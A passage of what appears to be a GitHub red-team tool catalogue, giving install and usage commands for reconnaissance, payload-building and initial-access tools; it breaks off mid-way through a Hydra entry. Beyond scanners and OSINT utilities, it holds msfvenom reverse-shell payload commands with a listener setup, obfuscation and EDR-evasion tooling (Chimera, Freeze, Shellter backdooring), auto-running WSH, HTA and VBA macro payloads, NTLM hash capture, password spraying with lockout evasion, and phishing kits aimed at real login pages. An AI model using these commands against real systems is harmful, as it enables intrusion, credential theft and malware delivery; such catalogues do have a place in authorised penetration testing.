\n\n```bash\nsudo apt update \u0026\u0026 sudo apt install -y feroxbuster\n```\n\n**Install: (Mac)** \n\n```bash\ncurl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash\n```\n\n**Install: (Windows)** \n\n```bash\nInvoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\\feroxbuster.zip\n.\\feroxbuster\\feroxbuster.exe -V\n```\n\nFor full installation instructions see [here](https://epi052.github.io/feroxbuster-docs/docs/installation/).\n\n**Usage:** \n\n```bash\n# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\n./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx\n\n# Scan with headers\n./feroxbuster -u http://127.1 -H Accept:application/json \"Authorization: Bearer {token}\"\n\n# Read URLs from stdin\ncat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy requests through burpsuite\n./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\n```\n\n Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).\n\n![image](https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png)\n\n*Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*\n\n### [πŸ”™](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)\n\nA tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).\n\nFeatures:\n\n- Cloud detection (IPINFO API and Source Code)\n- Fast (concurrent)\n- Cross Platform (windows, linux, mac)\n- User-Agent Randomization\n- Proxy Randomization (HTTP, Socks5)\n\n**Install:** \n\nDownload the latest [release](https://github.com/0xsha/CloudBrute/releases) for your system and follow the usage.\n\n**Usage:** \n\n```bash\n# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \"./data/storage_small.txt\"\n\n# Output results to file\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt\n```\n\n![image](https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png)\n\n*Image used from https://github.com/0xsha/CloudBrute*\n\n### [πŸ”™](#tool-list)[dnsrecon](https://www.kali.org/tools/dnsrecon/#dnsrecon)\n\ndnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.\n\n**Install:** \n\n```bash\nsudo apt install dnsrecon\n```\n\n**Usage:** \n\n```bash\ndnsrecon -d google.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png)\n\n### [πŸ”™](#tool-list)[shodan.io](https://www.shodan.io/dashboard)\n\nShodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.\n\n![image](https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png)\n\n### [πŸ”™](#tool-list)[AORT](https://github.com/D3Ext/AORT)\n\nTool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.\n\n**Install:** \n\n```bash\ngit clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 AORT.py -d google.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png)\n\n### [πŸ”™](#tool-list)[spoofcheck](https://github.com/BishopFox/spoofcheck)\n\nA program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.\n\nDomains are spoofable if any of the following conditions are met:\n\n- Lack of an SPF or DMARC record\n- SPF record never specifies `~all` or `-all`\n- DMARC policy is set to `p=none` or is nonexistent\n\n**Install:**\n\n```bash\ngit clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n./spoofcheck.py [DOMAIN]\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png)\n\n### [πŸ”™](#tool-list)[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)\n\nAWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.\n\n**Install:**\n\n```\ngit clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```\nusage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n -h, --help show this help message and exit\n -D Download files. This requires significant diskspace\n -d If set to 1 or True, create directories for each host w/ results\n -t THREADS number of threads\n -l HOSTLIST\n -g GREPWORDS Provide a wordlist to grep for\n -m MAXSIZE Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\n```\n\n### [πŸ”™](#tool-list)[GitHarvester](https://github.com/metac0rtex/GitHarvester)\n\nNice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.\n\n**Install:**\n\n```\ngit clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester\n```\n\n**Usage:** \n\n```\n./githarvester.py\n```\n\n### [πŸ”™](#tool-list)[truffleHog](https://github.com/dxa4481/truffleHog)\n\nTruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.\n\n**Install (Binaries):** [Link](https://github.com/trufflesecurity/trufflehog/releases)\n\n**Install (Go):**\n\n```\ngit clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install\n```\n\n**Usage:** \n\n```\ntrufflehog https://github.com/trufflesecurity/test_keys\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png)\n\n### [πŸ”™](#tool-list)[Dismap](https://github.com/zhzyker/dismap)\n\nDismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.\n\nDismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.\n\n**Install:** \n\nDismap is a binary file for Linux, MacOS, and Windows. Go to [Release](https://github.com/zhzyker/dismap/releases) to download the corresponding version to run:\n\n```bash\n# Linux or MacOS\nchmod +x dismap-0.3-linux-amd64\n./dismap-0.3-linux-amd64 -h\n\n# Windows\ndismap-0.3-windows-amd64.exe -h\n```\n\n**Usage:** \n\n```bash\n# Scan 192.168.1.1 subnet\n./dismap -i 192.168.1.1/24\n\n# Scan, output to result.txt and json output to result.json\n./dismap -i 192.168.1.1/24 -o result.txt -j result.json\n\n# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds\n./dismap -i 192.168.1.1/24 --np --timeout 10\n\n# Scan, Number of concurrent threads 1000\n./dismap -i 192.168.1.1/24 -t 1000\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png)\n\n*Image used from https://github.com/zhzyker/dismap*\n\n### [πŸ”™](#tool-list)[enum4linux](https://github.com/CiscoCXSecurity/enum4linux)\n\nA tool for enumerating information from Windows and Samba systems.\n\nIt can be used to gather a wide range of information, including:\n\n- Domain and domain controller information\n- Local user and group information\n- Shares and share permissions\n- Security policies\n- Active Directory information\n\n**Install: (Apt)** \n\n```bash\nsudo apt install enum4linux\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/CiscoCXSecurity/enum4linux\ncd enum4linux\n```\n\n**Usage:** \n\n```bash\n# 'Do everything'\nenum4linux.pl -a 192.168.2.55\n\n# Obtain list of usernames (RestrictAnonymous = 0)\nenum4linux.pl -U 192.168.2.55\n\n# Obtain list of usernames (using authentication)\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n# Get a list of groups and their members\nenum4linux.pl -G 192.168.2.55\n\n# Verbose scan \nenum4linux.pl -v 192.168.2.55\n```\n\nFull usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/).\n\n![image](https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png)\n\n*Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*\n\n### [πŸ”™](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)\n\nDangerously fast dns/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), written in rust.\n\nYou will need a subdomains file. *E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.\n\n**Install:** \n\nDownload the latest release from [here](https://github.com/Esc4iCEscEsc/skanuvaty/releases).\n\n```bash\n# Install a wordlist\nsudo apt install wordlists\nls /usr/share/dirb/wordlists\nls /usr/share/amass/wordlists\n```\n\n**Usage:** \n\n```bash\nskanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png)\n\n*Image used from https://github.com/Esc4iCEscEsc/skanuvaty*\n\n### [πŸ”™](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)\n\nMetabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.\n\n**Main Features:**\n\n- Searching information about IP Address, ASN and Organization.\n- Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.\n- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).\n- Get Summary about IP address (powered by [@thebl4ckturtle](https://github.com/theblackturtle))\n\n**Install:** \n\n```bash\ngo install github.com/j3ssie/metabigor@latest\n```\n\n**Usage:** \n\n```bash\n# discovery IP of a company/organization\necho \"company\" | metabigor net --org -o /tmp/result.txt\n\n# Getting more related domains by searching for certificate info\necho 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command\n\n# Only run rustscan with full ports\necho '1.2.3.4/24' | metabigor scan -o result.txt\n\n# Reverse Whois to find related domains\necho 'example.com' | metabigor related -s 'whois'\n\n# Get Google Analytics ID directly from the URL\necho 'https://example.com' | metabigor related -s 'google-analytic'\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png)\n\n*Image used from https://github.com/j3ssie/metabigor*\n\n### [πŸ”™](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)\n\nGitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. \n\nGitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. \n\nThe findings will be presented through a web interface for easy browsing and analysis.\n\n**Note:** *Gitrob will need a Github access token in order to interact with the Github API. [Create a personal access token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) and save it in an environment variable in your .bashrc or similar shell configuration file:*\n\n```bash\nexport GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\n```\n\n**Install: (Go)** \n\n```bash\ngo get github.com/michenriksen/gitrob\n```\n\n**Install: (Binary)** \n\nA [precompiled version](https://github.com/michenriksen/gitrob/releases) is available for each release.\n\n**Usage:** \n\n```bash\n# Run against org\ngitrob {org_name}\n\n# Saving session to a file\ngitrob -save ~/gitrob-session.json acmecorp\n\n# Loading session from a file\ngitrob -load ~/gitrob-session.json\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png)\n\n*Image used from https://www.uedbox.com/post/58828/*\n\n### [πŸ”™](#tool-list)[gowitness](https://github.com/sensepost/gowitness)\n\nGowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.\n\n**Install: (Go)** \n\n```bash\ngo install github.com/sensepost/gowitness@latest\n```\n\nFull installation information can be found [here](https://github.com/sensepost/gowitness/wiki/Installation).\n\n**Usage:** \n\n```bash\n# Screenshot a single website\ngowitness single https://www.google.com/\n\n# Screenshot a cidr using 20 threads\ngowitness scan --cidr 192.168.0.0/24 --threads 20\n\n# Screenshot open http services from an namp file\ngowitness nmap -f nmap.xml --open --service-contains http\n\n# Run the report server\ngowitness report serve\n```\n\nFull usage information can be found [here](https://github.com/sensepost/gowitness/wiki/Usage).\n\n![image](https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png)\n\n*Image used from https://github.com/sensepost/gowitness*\n\nResource Development\n====================\n\n### [πŸ”™](#tool-list)[remoteInjector](https://github.com/JohnWoodman/remoteinjector)\n\nInjects link to remote word template into word document.\n\nThis Python-based utility modifies a .docx file’s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.\n\n[Related Blog Post](https://john-woodman.com/research/vba-macro-remote-template-injection/)\n\n**Install:** \n\n```bash\ngit clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector\n```\n\n**Usage:** \n\n```bash\npython3 remoteinjector.py -w https://example.com/template.dotm example.docx\n```\n\n### [πŸ”™](#tool-list)[Chimera](https://github.com/tokyoneon/Chimera)\n\nChimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.\n\n**Install:** \n\n```bash\nsudo apt-get update \u0026\u0026 sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https://github.com/tokyoneon/chimera /opt/chimera\nsudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/\nsudo chmod +x chimera.sh; ./chimera.sh --help\n```\n\n**Usage:** \n\n```bash\n./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\n```\n\n![image](https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png)\n\n### [πŸ”™](#tool-list)[msfvenom](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/)\n\nMsfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.\n\n**Set Up Listener**\n\n```shell\nuse exploit/multi/handler \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST your-ip \nset LPORT listening-port \nrun\n```\n\n#### Msfvenom Commands\n\n**PHP:** \n\n```bash\nmsfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R\n```\n\n**Windows:** \n\n```bash\nmsfvenom -p windows/shell/reverse_tcp LHOST=\u003cIP\u003e LPORT=\u003cPORT\u003e -f exe \u003e shell-x86.exe\n```\n\n**Linux:** \n\n```bash\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cIP\u003e LPORT=\u003cPORT\u003e -f elf \u003e shell-x86.elf\n```\n\n**Java:** \n\n```bash\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=\u003cIP\u003e LPORT=\u003cPORT\u003e -f raw \u003e shell.jsp\n```\n\n**HTA:** \n\n```bash\nmsfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh \u003e shell.hta\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png)\n\n### [πŸ”™](#tool-list)[Shellter](https://www.shellterproject.com/)\n\nShellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.\n\nIt can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).\n\nShellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.\n\nFull README information can be found [here](https://www.shellterproject.com/Downloads/Shellter/Readme.txt).\n\n**Install: (Kali)** \n\n```bash\napt-get update\napt-get install shellter\n```\n\n**Install: (Windows)** \n\nVisit the [download page](https://www.shellterproject.com/download/) and install.\n\n**Usage:** \n\nJust pick a legit binary to backdoor and run Shellter.\n\nSome nice tips can be found [here](https://www.shellterproject.com/tipstricks/).\n\nLots of community usage demos can be found [here](https://www.shellterproject.com/shellter-community-demos/).\n\n![image](https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png)\n\n*Image used from https://www.kali.org/tools/shellter/images/shellter.png*\n\n### [πŸ”™](#tool-list)[Freeze](https://github.com/optiv/Freeze)\n\nFreeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. \n\nFreeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.\n\n**Install:** \n\n```bash\ngit clone https://github.com/optiv/Freeze\ncd Freeze\ngo build Freeze.go\n```\n\n**Usage:** \n\n```\n -I string\n Path to the raw 64-bit shellcode.\n -O string\n Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n -console\n Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n -encrypt\n Encrypts the shellcode using AES 256 encryption\n -export string\n For DLL Loaders Only - Specify a specific Export function for a loader to have.\n -process string\n The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. Example 'notepad.exe' (default \"notepad.exe\")\n -sandbox\n Enables sandbox evasion by checking:\n Is Endpoint joined to a domain?\n Does the Endpoint have more than 2 CPUs?\n Does the Endpoint have more than 4 gigs of RAM?\n -sha256\n Provides the SHA256 value of the loaders (This is useful for tracking)\n```\n\n![image](https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png)\n\n*Image used from https://www.blackhatethicalhacking.com/tools/freeze/*\n\n### [πŸ”™](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)\n\nThis script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.\n\nMicrosoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image. \n\n**Install:** \n\n```\ngit clone https://github.com/0x09AL/WordSteal\ncd WordSteal\n```\n\n**Usage:** \n\n```bash\n# Generate document containing 'test.jpg' and start listener\n./main.py 127.0.0.1 test.jpg 1\n\n# Generate document containing 'test.jpg' and do not start listener\n./main.py 127.0.0.1 test.jpg 0\\n\n```\n\n![image](https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png)\n\n*Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*\n\n### [πŸ”™](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/)\n\nThis site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system. \n\nIt can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.\n\nWhen developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.\n\n**Usage:** \n\nVisit [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/41b424f3-053c-440b-b0fd-235e95980d9a)\n\n*Image used from http://undocumented.ntinternals.net/*\n\n### [πŸ”™](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html)\n\nThis technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances. \n\nMost of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers. \n\nThe undocumented functions are described briefly whereas the documented ones are just listed here for reference.\n\n**Usage:** \n\nVisit [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/b7532b7d-1abc-4af6-be92-f6f78d24a788)\n\n*Image used from https://codemachine.com*\n\n### [πŸ”™](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)\n\nA collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.\n\n**Usage:** \n\nVisit [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/7f7ad942-48d7-42e7-a3cc-55ec84139058)\n\n*Image used from https://github.com/S3cur3Th1sSh1t*\n\n### [πŸ”™](#tool-list)WSH\n\n**Creating payload:** \n\n```vbs\nSet shell = WScript.CreateObject(\"Wscript.Shell\")\nshell.Run(\"C:\\Windows\\System32\\calc.exe \" \u0026 WScript.ScriptFullName),0,True\n```\n\n**Execute:** \n\n```bash\nwscript payload.vbs\ncscript.exe payload.vbs\nwscript /e:VBScript payload.txt //If .vbs files are blacklisted\n```\n\n### [πŸ”™](#tool-list)HTA\n\n**Creating payload:**\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\n\tvar c= 'cmd.exe'\n\tnew ActiveXObject('WScript.Shell').Run(c);\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n**Execute:** Run file\n\n### [πŸ”™](#tool-list)VBA\n\n**Creating payload:**\n\n```python\nSub calc()\n\tDim payload As String\n\tpayload = \"calc.exe\"\n\tCreateObject(\"Wscript.Shell\").Run payload,0\nEnd Sub\n```\n\n**Execute:** Set function to Auto_Open() in macro enabled document\n\nInitial Access\n====================\n\n### [πŸ”™](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)\n\nLaunch a password spray / brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.\n\nCredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.\n\nFeatures:\n- Fully supports all AWS Regions\n- Automatically generates APIs for proxy pass-through\n- Spoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers\n- Multi-threaded processing\n- Password delay counters \u0026 configuration for lockout policy evasion\n- Easily add new plugins\n- Fully anonymous\n\n**Install:** \n\n```bash\ngit clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt\n```\n\nFor full installation instructions see [here](https://whynotsecurity.com/blog/credmaster/#setup).\n\n**Usage:** \n\n```bash\npython3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config config.json\n```\n\nThis tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b\n\n![credmaster](https://github.com/user-attachments/assets/f678cca4-7a53-41e7-9323-51e8efd0e6ba)\n\n*Image used from https://github.com/knavesec/CredMaster/wiki*\n\n### [πŸ”™](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)\n\nTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\n\n**Install:** \n\n```bash\npip install https://github.com/blacklanternsecurity/TREVORspray\n```\n\n**Usage:** \n\n```bash\n# Recon\npython3 ./trevorspray --recon evilcorp.com\n\n# Enumerate users via OneDrive\npython3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n# Spray against discovered\npython3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token\n```\n\nFor full usage instructions see [here](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).\n\n![TREVORspray](https://github.com/user-attachments/assets/67c64f6d-527a-4b59-8dd9-b73bc68274f4)\n\n*Image used from https://github.com/blacklanternsecurity/TREVORspray*\n\n### [πŸ”™](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)\n\nToolkit demonstrating another approach of a QRLJacking attack, allowing to perform remote account takeover, through sign-in QR code phishing.\n\nIt consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.\n\nDemo [video](https://www.youtube.com/watch?v=8pfodWzqMcU)\n\n**Install: (Extension)** \n\nYou can load the extension in Chrome, through `Load unpacked` feature:\nhttps://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked\n\nOnce the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.\n\n**Install: (Server)** \n\n```bash\ngit clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat\n```\n\n**Usage:** \n\n1. Run the server by running the built server binary: `./server/build/evilqr-server`\n2. Open any of the supported websites in your Chrome browser, with installed **Evil QR** extension:\n```\nhttps://discord.com/login\nhttps://web.telegram.org/k/\nhttps://whatsapp.com\nhttps://store.steampowered.com/login/\nhttps://accounts.binance.com/en/login\nhttps://www.tiktok.com/login\n```\n3. Make sure the sign-in QR code is visible and click the **Evil QR** extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors.\n4. Open the server's phishing page URL: `http://127.0.0.1:35000` (default)\n\n![evilqr](https://github.com/user-attachments/assets/00ad78c5-1978-4e59-a522-7e8b9c39b1c3)\n\n*Image used from https://breakdev.org/evilqr-phishing/*\n\n### [πŸ”™](#tool-list)[CUPP](https://github.com/Mebus/cupp)\n\nThe most common form of authentication is the combination of a username and a password or passphrase. Passwords can sometimes be guessed profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.\n\nThat is why CUPP was born.\n\n**Install:** \n\n```bash\ngit clone https://github.com/Mebus/cupp;cd cupp\n```\n\n**Usage:** \n\n```bash\n# Run in interactive mode\npython3 ./cupp.py -i\n```\n\n![cupp](https://github.com/user-attachments/assets/39ad1c58-de4e-449a-b2d4-a9629d5ab82c)\n\n*Image used from https://github.com/Mebus/cupp*\n\n### [πŸ”™](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)\n\nThe Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.\n\n[hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/)\n\n[Hak5 Documentation](https://docs.hak5.org/bash-bunny/)\n\n[Nice Payload Repo](https://github.com/hak5/bashbunny-payloads)\n\n[Product Page](https://hak5.org/products/bash-bunny)\n\n![image](https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png)\n\n### [πŸ”™](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)\n\nevilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication\n\n**Install:** \n\n```bash\ngit clone https://github.com/fin3ss3g0d/evilgophish\n```\n\n**Usage:**\n\n```\nUsage:\n./setup \u003croot domain\u003e \u003csubdomain(s)\u003e \u003croot domain bool\u003e \u003credirect url\u003e \u003cfeed bool\u003e \u003crid replacement\u003e \u003cblacklist bool\u003e\n - root domain - the root domain to be used for the campaign\n - subdomains - a space separated list of evilginx2 subdomains, can be one if only one\n - root domain bool - true or false to proxy root domain to evilginx2\n - redirect url - URL to redirect unauthorized Apache requests\n - feed bool - true or false if you plan to use the live feed\n - rid replacement - replace the gophish default \"rid\" in phishing URLs with this value\n - blacklist bool - true or false to use Apache blacklist\nExample:\n ./setup.sh example.com \"accounts myaccount\" false https://redirect.com/ true user_id false\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png)\n\n### [πŸ”™](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)\n\nThis framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.\n\n**Install:** \n\n```bash\ngit clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install\n```\n\n**Usage:** \n\n```bash\npython3 setoolkit\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png)\n\n### [πŸ”™](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)\n\nNice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.\n\n**Install:** \n\n```bash\nsudo apt install hydra\n```\n\n**Usage:**\n\n```bash\nhydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form \"login.php:username-^USER^\u0026password=^PASS^:Error\"\nhydra -L USER.TXT -P PASS.TXT 1.1.1.1 